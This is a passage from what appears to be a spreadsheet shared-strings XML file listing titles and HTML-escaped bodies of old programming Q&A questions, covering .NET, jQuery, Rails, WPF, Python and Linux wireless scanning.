    <t>Why would you use a ".pfx" file in .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the ".pfx" extension used for in .NET?&lt;/p&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;Why does it ask for a password when the solution is being built?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Data Access Library Return DataSet or Object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a general consensus out there for when working with library's that call stored procedures?  Return datasets or use sqldatareader to populate custom objects?&lt;/p&gt;
&lt;p&gt;Is the cost of serialization your Data Transport Object less then a DataSet?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the difference between using jQuery's onclick and the onclick attribute?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the difference between the following two pieces of HTML (apologies if there are any typos as I'm typing this freehand)?&lt;/p&gt;
&lt;p&gt;Using jQuery:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script type="text/javascript"&amp;gt;
    $(document).ready(function() {
        $("#clickme").click(function() {
            alert("clicked!");
        });
    });
&amp;lt;/script&amp;gt;
&amp;lt;a id="clickme" href="javascript:void(0);"&amp;gt;click me&amp;lt;/a&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Not using jQuery:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;a id="clickme" href="javascript:void(0);" onclick="alert('clicked!');"&amp;gt;click me&amp;lt;/a&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Keyboard hook w/ C# and WPF for minimized system tray application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a WPF application that I minimize to the system tray through this.Hide() and System.Windows.Forms.NotifyIcon.  When it's minimized, I want to have a keyboard hook maximize the application.  How do I register a keyboard hook like Windows-Button &amp;amp; T, for example.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>productivity superstar frameworks/tools for side gigs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you were going to start building web sites as a consulting business on the side -- keeping your day job -- and you also had a toddler and a wife, what frameworks/tools would you pick to save you typing? &lt;/p&gt;
&lt;p&gt;Any language. &lt;/p&gt;
&lt;p&gt;I'm looking for a productivity superstar stack that won't tie my hands too much when I have to update the site 6 months later, or "evolve" the data model once in production.&lt;/p&gt;
&lt;p&gt;It needs to allow me to say "yes" to the client: community features, CMS, security, moderation, AJAX, ...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to install JScience library in Eclipse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Or just any library, in general? I downloaded the bin.zip file, but I can't seem to do much with it? This is driving me up the wall...&lt;/p&gt;
&lt;p&gt;EDIT: In other words, there is no "standard" way to do it? I know how to add the Jar files, is it ok to just put them (and the docs) anywhere?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to flush all caches in process for EntLib Caching</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to know if there is a way to tell the Enterprise Library Caching objects to flush all configured caches for that process to flush.&lt;/p&gt;
&lt;p&gt;Even enumerating through all of the configured caches for that process, and manually flushing each one, is ok, but is there an API method from EntLib.Caching that will give me those values?&lt;/p&gt;
&lt;p&gt;Or do I need to enum through the config file myself?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I obtain the dimensions of a Flash video file from PHP code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application where users can upload video files of any size, and I'd like to be able to determine the the height/width of a Flash video file (flv or f4v) from a PHP script so that I can size the player appropriately.  I'd love a pure PHP solution, but I'd be open to shelling out to a command line tool and parsing the output (if such a tool exists).&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HTMl Helpers in MVC: How do I render html tags with helper such as ActionLink?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When using ActionLink to render data from database which has HTML tags &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(ie &amp;lt;p&amp;gt;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;incorporated in it, ActionLink escapes the tags. What is the best way to handle this? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calculating the semantic distance between words</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of a good way to calculate the "semantic distance" between two words?&lt;/p&gt;
&lt;p&gt;Immediately an algorithm that counts the steps between words in a thesaurus springs to mind.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;OK, looks like a similar question has already been answered: &lt;a href="http://stackoverflow.com/questions/62328/"&gt;Is there an algorithm that tells the semantic similarity of two phrases&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Going where PHP parse_url() doesn't - Parsing only the domain</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;PHP's parse_url() has a host field, which includes the full host.  I'm looking for the most reliable (and least costly) way to only return the domain and TLD.&lt;/p&gt;
&lt;p&gt;Given the examples:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://www.google.com/foo"&gt;http://www.google.com/foo&lt;/a&gt;, parse_url() returns www.google.com for host&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.google.co.uk/foo"&gt;http://www.google.co.uk/foo&lt;/a&gt;, parse_url() returns www.google.co.uk for host&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I am looking for only &lt;strong&gt;google.com&lt;/strong&gt; or &lt;strong&gt;google.co.uk&lt;/strong&gt;.  I have contemplated a table of valid TLD's/suffixes and only allowing those and one word.  Would you do it any other way?  Does anyone know of a pre-canned valid REGEX for this sort of thing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why doesn't a Dictionary access nonexistent keys like a Hashtable does?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I'm using a &lt;code&gt;Hashtable&lt;/code&gt;, I can write code like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;object item = hashtable[key] ?? default_value;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That works whether or not &lt;code&gt;key&lt;/code&gt; appears in the &lt;code&gt;Hashtable&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I can't do that with a &lt;code&gt;Dictionary&amp;lt;TKey. TValue&amp;gt;&lt;/code&gt;.  If the key's not present in the dictionary, that will throw a &lt;code&gt;KeyNotFoundException&lt;/code&gt;.  So I have to write code like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MyClass item;
if (!(dict.TryGetValue(key, out item))
{
   item = default_value;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm wondering why this is.  &lt;code&gt;Dictionary&amp;lt;TKey, TValue&amp;gt;&lt;/code&gt; is just a wrapper around &lt;code&gt;Hashtable&lt;/code&gt;.  Why has this restriction been added to it?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;For another perspective on PopCatalin's answer (see below), the code I'd written above won't work if the dictionary's values are of a value type.  If I'm using a &lt;code&gt;Dictionary&amp;lt;int, int&amp;gt;&lt;/code&gt;, then the code I would &lt;em&gt;like&lt;/em&gt; to use looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int i = dict[key] ?? default_value;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And that won't compile, because &lt;code&gt;dict[key]&lt;/code&gt; isn't a nullable or reference type.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to get the raw param string in rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given the following url: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://foo.com?bar=1&amp;amp;wee=2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is the quickest way to get the raw param part of the url from an action? &lt;/p&gt;
&lt;p&gt;i.e.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;?bar=1&amp;amp;wee=2
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>WPF Default Credential</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to access .net 2.0 Web Service from WPF. I generated the proxy using Visual Studio and also Credential of the proxy to Default Credentials. &lt;/p&gt;
&lt;p&gt;I am getting 401 Unauthorized while accessing the web service. When I output the user name from the default credential it is empty, Am I missing anything?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;label&gt; on checkboxes: is there a reason why more websites don't use it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I always try to do the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;label&amp;gt;&amp;lt;input type="checkbox" /&amp;gt; Some text&amp;lt;/label&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;label for="idOfField"&amp;gt;&amp;lt;input type="checkbox" id="idOfField" /&amp;gt; Some text&amp;lt;/label&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My question is related to the label tag, specifically on a checkbox.&lt;/p&gt;
&lt;p&gt;Most websites (I would say &gt;40%) don't use the &lt;code&gt;&amp;lt;label&amp;gt;&lt;/code&gt; tag.&lt;/p&gt;
&lt;p&gt;Is there a reason for this? Is there a problem in a browser or some other issue?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Incase people don't know about the &lt;code&gt;&amp;lt;label&amp;gt;&lt;/code&gt; tag, it has a number of advantages:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;checkboxes &amp;amp; radios: you can click on the text as well as the checkbox to check the checkbox (as well as focus I believe):  Blah blah blah&lt;/li&gt;
&lt;li&gt;other inputs: if you click the text, it will focus the input (textarea, text, file) (this functionality isn't as useful as checkboxes &amp;amp; radios)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Note 2:&lt;/strong&gt; Some people have mentioned that example #2 is more correct than #1 (above), but according to the documentation &lt;a href="http://www.w3.org/TR/html401/interact/forms.html#h-17.9.1"&gt;here&lt;/a&gt;, either is correct&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make an embedded video not autoplay</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm embedding a Flash video into an HTML and would like the user to have to click it to begin playing. According to the &lt;a href="http://kb.adobe.com/selfservice/viewContent.do?externalId=tn_12701"&gt;Adobe &lt;code&gt;&amp;lt;object&amp;gt;&lt;/code&gt; / &lt;code&gt;&amp;lt;embed&amp;gt;&lt;/code&gt; element documentation&lt;/a&gt;, there are variety of methods to do this:&lt;/p&gt;
&lt;p&gt;1) Add a Flash parameter inside the &lt;code&gt;&amp;lt;object&amp;gt;&lt;/code&gt; tag:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;param name="play" value="false"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;2) Add the attribute &lt;code&gt;play&lt;/code&gt; inside the &lt;code&gt;&amp;lt;embed&amp;gt;&lt;/code&gt; tag:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;embed ... play="false"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;3) Add the attribute &lt;code&gt;flashvars&lt;/code&gt; inside the &lt;code&gt;&amp;lt;embed&amp;gt;&lt;/code&gt; tag:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;embed ... flashvars="play=false"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which is awesome. Only ... none of them work for me:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://johnboxall.github.com/test/flash/flash.htm"&gt;http://johnboxall.github.com/test/flash/flash.htm&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;My code looks like this now:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;object width="590" height="475"&amp;gt;
	&amp;lt;param name="movie" value="untitled_skin.swf"&amp;gt;
	&amp;lt;param name="play" value="false"&amp;gt;
	&amp;lt;embed src="untitled_skin.swf" width="590" height="475" type="application/x-shockwave-flash" play="false" flashvars="autoplay=false&amp;amp;play=false" menu="false"&amp;gt;&amp;lt;/embed&amp;gt;
&amp;lt;/object&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Anyone have any ideas? What am I doing wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Development tactics : phoenix development cycles</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering how you guys actually develop large applications when you are your own boss. For myself I have been learning the hard way the necessity for patience and hope. 
I have been working on implementing an application (in the form of a series of scripts linked to a database) that clusters wikipedia articles using a combination of knowledge of wikilinks and article text/content. I have been at it for two years now; no results yet.&lt;/p&gt;
&lt;p&gt;I cant seem to get any results for I am continuously reengineering my scipts and db due to changes in either the essence (pseudo-pseudo code, the theoretical algorithm) or form (script, threads, db tables, the practical algorithm) of the algorithm. Basically, I find myself continuously learning from the mistakes I discover while implementing; the devil being in the details, so are the answers it seems. &lt;/p&gt;
&lt;p&gt;Anyway, every time I reengineer a script or a table or something, I need to scrap all my documentation and script. I am now able to do this without fear, but it has made me hate programming (I hate the details). &lt;/p&gt;
&lt;p&gt;I feel that reengineering is the way to go since I am thinking long-term and I wish to learn fast, but I am wondering if you guys have a similar programming experience or if you never really need or choose to have a better script come out of the death of the last one (like a phoenix). &lt;/p&gt;
&lt;p&gt;The hardest part for me is scraping my documentation for I spend more time documenting than coding; I use documentation as a means to discuss issues and consider solutions; I use it to formulate implementable solutions. While if it would be but for me, I would not mind scraping it, yet I always write it as if it were to be published the next week for while developing a script, I also seek to develop myself; I also try, like those of you who participate to this website, to share my knowledge or wisdom with others.&lt;/p&gt;
&lt;p&gt;Anyways, I have been developing at full speed these last 2 months, reengineering countless essays, scripts, tables, etc; my patience is running low for I seek results. &lt;/p&gt;
&lt;p&gt;Any tactics, any help, any experiences or anecdotes you wish to share?&lt;/p&gt;
&lt;p&gt;Thanks for your consideration!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Google Map Overlay Icon disappears at certain zoom level</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I notice that Firefox 3 demonstrates this problem. I put down an overlay icon and play around with the map zoom. At certain zoom level, I found that the icon disappears for some unknown reason. &lt;/p&gt;
&lt;p&gt;Zooming out brings back the icon. Or during the disappearance, I click on the Google Map and it will somehow trigger to bring back the icon.&lt;/p&gt;
&lt;p&gt;I suspect it has something to do with the event triggering. Internet Explorer doesn't demonstrate the same problem though.&lt;/p&gt;
&lt;p&gt;Any advice? Like how to trigger update event on Firefox?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>rails model attributes without corresponding column in db</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some rails models which don't need any persistence, however I'd like rails to think the model actually has attributes x, y, z so when calling methods like to_json in the controller I get them included for free.&lt;/p&gt;
&lt;p&gt;For example,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class ModelWithoutTableColumns &amp;lt;&amp;lt; ActiveRecord::Base
def x
   return "Custom stuff here"
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There is no column x in the database for Table "ModelWithoutTable" (sorry for the slightly confusing name!)&lt;/p&gt;
&lt;p&gt;Anyone have an idea how to tackle this one?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Making JavaFX compile to Java 1.6 level source code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I make JavaFX with netbeans compile my code to 1.6 level compliance.&lt;/p&gt;
&lt;p&gt;At the moment it seems to be hard coded to 1.5 levels - stopping me from using useful tools in java.awt.Desktop (and the like)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>iPhone Development - Complex application using multiple views/xib/nib</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm new to iPhone development, and multiple views (xib or nib) are really confusing me. This is what i'm trying to achieve...&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;View with Tab Bar (Tab 1, Tab 2, Tab 3)&lt;/li&gt;
&lt;li&gt;Tab 2 View (Navigation Controller)
2.1 Selecting Table Row will show a View with cell details
2.2 Add button on the navigation bar will show a series of view interfaces to get different type of information (e.g. Location Information, Personal Information, etc) - Need this to be sequential, can't use control segment for this. Once information is successfully gathered, create a new cell in Tab 2 View Table, Save related information to a custom structure, and show a completion page with 2 options (Add another, View added item - readonly view)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I'm confused about how to handle these multiple views (both linking them together, and communicating information back and forth). Will all these be handled by my application delegate class or i can/should use multiple delegate classes? Either way can you point me in the right direction - possibly some sample application or tutorial explaining how to handle situation like this or more complex.&lt;/p&gt;
&lt;p&gt;Any help in this regard will be highly appreciated.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;I have seen both TheElements and SeismicXML examples. &lt;/p&gt;
&lt;p&gt;TheElements sample code gives a basic idea of how to use &lt;code&gt;UITabBarController&lt;/code&gt;, and &lt;code&gt;UINavigationController&lt;/code&gt;, but the example does not discuss passing information from Child Controller to Parent. &lt;/p&gt;
&lt;p&gt;In my case, I have a &lt;code&gt;UITabBarController&lt;/code&gt;, one of the Tab shows a &lt;code&gt;UINavigationController&lt;/code&gt; with (+) on the top right corner or Navigation Bar. Now (+) will open an interface for user input and that input will be used to store the data (say in sql), and create a new Table Cell in &lt;code&gt;UITableView&lt;/code&gt; embedded in &lt;code&gt;UINavigationController&lt;/code&gt;. Now, the interface that will open using (+) will take user input following a sequence of steps (like Main &gt; Step 1 &gt; Step 2&gt; Complete). Each step will show a separate view. I'm getting hard time trying to design this model. Or, maybe I'm not used to programming in Cocoa/iPhone and I'm not looking straight. What other options do I have - when it comes to taking user input involving 20-30 fields (Text, List, Date, Image e.t.c.). Can you provide some input regarding this.&lt;/p&gt;
&lt;p&gt;Thanks for your help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Design question for abstract base class?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Have a interface &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class abc {
public:
virtual int foo() = 0;  
...
}
class concrete1: public abc { 
public:
int foo() { 
..
}
class concrete2 : public abc {
public:
int foo() {
..
}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now in my main program I need to construct classes based upon a value of a variable &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;abc *a;
if (var == 1)
   a = new concrete1();
else
   a = new concrete2();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Obviously I don't want these two lines everywhere in the program (please note I have simplified here so that things are clear). What design pattern should I be using if there are any?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I enforce a package-level build order in eclipse</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Explanation:
Say package A is always built first and then package B. I need to configure my eclipse workspace such that it mimics the build environment and shows compilation errors when sources in package A refer package B. Is this possible? If yes, how?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should developers fear updates to their workstation software / development stack?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As I have discovered, many developers avoid any updating (automatic or manual), because they fear it might do changes to their machine they don't understand, and the software they are developing might fail at some point for reasons they don't know.&lt;/p&gt;
&lt;p&gt;strategy A.) LEAVE THE SYSTEM AS IT IS, FOR AS LONG AS POSSIBLE.&lt;/p&gt;
&lt;p&gt;I personally like to have my system as "up to date" as possible (OS and app's), because generally I feel to have less trouble working this way.&lt;/p&gt;
&lt;p&gt;strategy B.) ALWAYS UP TO DATE&lt;/p&gt;
&lt;p&gt;What type of developer are you ? And why ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best compiler warning level for C/C++ compilers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What compiler warning level do you recommend for different C/C++ compilers?&lt;/p&gt;
&lt;p&gt;gcc and g++ will let you get away with a lot on the default level.  I find the best warning level for me is '-Wall'.  And I always try to remove fix the code for the warnings it generates.  (Even the silly ones about using parenthesis for logical precedence rules or to say I really mean 'if (x = y)')&lt;/p&gt;
&lt;p&gt;What are your favorite levels for the different compilers, such as Sun CC, aCC (HPUX ?), Visual Studio, intel?&lt;/p&gt;
&lt;p&gt;Edit:&lt;/p&gt;
&lt;p&gt;I just wanted to point out that I don't use "-Werror" (but I do understand it's utility) on gcc/g++ because, I use:&lt;/p&gt;
&lt;pre&gt;
#warning "this is a note to myself"
&lt;/pre&gt;
&lt;p&gt;in a few places in my code.  Do all the compilers understand the #warning macro?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Populating Rails Form Fields after an auto_complete field is populate</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to create a form in Rails 2.2.2 that populates a field based on a choice a user has made in an 'auto_complete' field. It looks as though the observe_field functionality is what I need to use but I'm stuck on how to update the value of an existing text field.&lt;/p&gt;
&lt;p&gt;The sequence of events I am trying to model is follows:&lt;/p&gt;
&lt;p&gt;1) Use types some characters into a auto_complete field, is given a list of options and selected the relevant option.&lt;/p&gt;
&lt;p&gt;2) The option corresponds to an ActiveRecord model and I would like to populate another field in the same form (i.e. set a default) using information from the selected ActiveRecord.&lt;/p&gt;
&lt;p&gt;Thanks for any guidance&lt;/p&gt;
&lt;p&gt;David&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I use the same controller and view for editing and creating models in ASP.NET MVC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Should I use the same controller and view for editing and creating models in ASP.NET MVC, or should I create a view and controller action for creating and a view and controller action for editing?&lt;/p&gt;
&lt;p&gt;The editing view is certainly likely to be different - it doesn't always make sense for the user interface for editing an object be the same as the view for creation,&lt;/p&gt;
&lt;p&gt;By separating the views I will avoid lots of "if statements" to determine if I'm editing or creating...&lt;/p&gt;
&lt;p&gt;Thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ignoring XML errors in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using XML minidom (xml.dom.minidom) in Python, but any error in the XML will kill the parser.
Is it possible to ignore them, like a browser for example?
I am trying to write a browser in Python, but it just throws an exception if the tags aren't fully compatible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reading and running a mathematical expression in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using Python, how would I go about reading in (be from a string, file or url) a mathematical expression (1 + 1 is a good start) and executing it? &lt;/p&gt;
&lt;p&gt;Aside from grabbing a string, file or url I have no idea of where to start with this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linq returns list or single object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Linq to Entities query like this one:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var results = from r in entities.MachineRevision
              where r.Machine.IdMachine == pIdMachine
                 &amp;amp;&amp;amp; r.Category == (int)pCategory
              select r;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Usually, I use the code below to check if some results are returned:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (results.Count() &amp;gt; 0)
{
    return new oMachineRevision(results.First().IdMachineRevision);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I'm getting &lt;strong&gt;NotSupportedException&lt;/strong&gt; in the &lt;strong&gt;if&lt;/strong&gt; condition.&lt;/p&gt;
&lt;p&gt;The error message is: &lt;em&gt;Unable to create a constant value of type 'Closure type'. Only primitive types ('such as Int32, String, and Guid') are supported in this context.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Note that &lt;strong&gt;pCategory&lt;/strong&gt; is an Enum type.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to dispose asynchronously?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have a class that implements the &lt;strong&gt;IDisposable&lt;/strong&gt; interface. Something like this:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://farm4.static.flickr.com/3199/3149605015_f090f20185_o.png" alt="http://www.flickr.com/photos/garthof/3149605015/" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MyClass&lt;/strong&gt; uses some unmanaged resources, hence the &lt;em&gt;Dispose()&lt;/em&gt; method from &lt;strong&gt;IDisposable&lt;/strong&gt; releases those resources. &lt;strong&gt;MyClass&lt;/strong&gt; should be used like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using ( MyClass myClass = new MyClass() ) {
    myClass.DoSomething();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Now, I want to implement a method that calls &lt;em&gt;DoSomething()&lt;/em&gt; asynchronously. I add a new method to &lt;strong&gt;MyClass&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://farm4.static.flickr.com/3103/3149605005_bde86e4e0b_o.png" alt="http://www.flickr.com/photos/garthof/3149605005/" /&gt;&lt;/p&gt;
&lt;p&gt;Now, from the client side, &lt;strong&gt;MyClass&lt;/strong&gt; should be used like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using ( MyClass myClass = new MyClass() ) {
    myClass.AsyncDoSomething();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, if I don't do anything else, this could fail as the object &lt;em&gt;myClass&lt;/em&gt; might be disposed before &lt;em&gt;DoSomething()&lt;/em&gt; is called (and throw an unexpected &lt;strong&gt;ObjectDisposedException&lt;/strong&gt;). So, the call to the &lt;em&gt;Dispose()&lt;/em&gt; method (either implicit or explicit) should be delayed until the asynchronous call to &lt;em&gt;DoSomething()&lt;/em&gt; is done. &lt;/p&gt;
&lt;p&gt;I think the code in the &lt;em&gt;Dispose()&lt;/em&gt; method should be executed &lt;strong&gt;in a asynchronous way, and only once all asynchronous calls are resolved&lt;/strong&gt;. I'd like to know which could be the best way to accomplish this.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;NOTE: For the sake of simplicity, I haven't entered in the details of how Dispose() method is implemented. In real life I usually follow the &lt;a href="http://msdn.microsoft.com/en-us/library/fs2xkftw(VS.80).aspx"&gt;Dispose pattern&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; Thank you so much for your responses. I appreciate your effort. As &lt;a href="http://stackoverflow.com/users/3055/chakrit"&gt;chakrit&lt;/a&gt; &lt;a href="http://stackoverflow.com/questions/400130/how-to-dispose-asynchronously#400165"&gt;has commented&lt;/a&gt;, I need that &lt;strong&gt;multiple calls to the async DoSomething can be made&lt;/strong&gt;. Ideally, something like this should work fine:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using ( MyClass myClass = new MyClass() ) {
    myClass.AsyncDoSomething();
    myClass.AsyncDoSomething();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'll study the counting semaphore, it seems what I'm looking for. It could also be a design problem. If I find it convenient, I will share with you some bits of the real case and what &lt;strong&gt;MyClass&lt;/strong&gt; really does.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I automatically delete tempfiles in c#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;br&gt;
What are a good way to ensure that a tempfile is deleted if my application closes or crashes? Ideally I would like to obtain a tempfile, use it and then forget about it.&lt;/p&gt;
&lt;p&gt;Right now I keep a list of my tempfiles and delete them with an eventhandler that triggers on Application.ApplicationExit.&lt;/p&gt;
&lt;p&gt;Is there a better way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Office XP Shared Addin VS 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a Shared Addin using VS 2008 for Office XP (Excel to be precise). However, after creating the project in Visual studio and changing the references to Office XP (apart from Extensibility which I don't seem to be able to find a copy for office xp) and adding excel.exe to the references as well. I now don't seem to be able to get the addin to install on any computers.&lt;/p&gt;
&lt;p&gt;Does anyone have any guides on writing Office XP addins using VS 2008 (Com Addins I might add)?&lt;/p&gt;
&lt;p&gt;Does anyone know the reference that I'm meant to have or things prior that I'm meant to have installed on the pc?&lt;/p&gt;
&lt;p&gt;I have three test pcs, this one has office xp, 2003 and 2007 on it and I can write an addin using 2003 references that runs on this but no other box. One with just office xp on it but also office xp PIAs installed and .NET and another one just with office xp on.&lt;/p&gt;
&lt;p&gt;Any help would be very much appriciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get a list of available wireless networks on Linux?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to get a list of the wireless networks available. Ideally this would be via some C call, but I don't mind if I have to kludge it with a system call. Even better if the required C call or program doesn't require some exotic 3rd party package.&lt;/p&gt;
&lt;p&gt;The internet seems to suggest I use &lt;code&gt;sudo iwlist &amp;lt;interface&amp;gt; scan&lt;/code&gt; which does seem to do the trick from the command line, but I'd rather not require root permissions. I only want to see the basics, not change anything.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tool for testing using parameter permutations</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I remember there existed a testing program/library that will run your code and/or unit tests, creating all kinds of permutations of the parameters (null values, random integers, strings and so on). I just can't remember what it was called and searching google doesn't seem to come up with anything.&lt;/p&gt;
&lt;p&gt;I know it was created for Java code and I think it was quite expensive as well. That's really all I can remember, anyone have a clue what program/library I am thinking about?&lt;/p&gt;
</t>
  </si>
  <si>
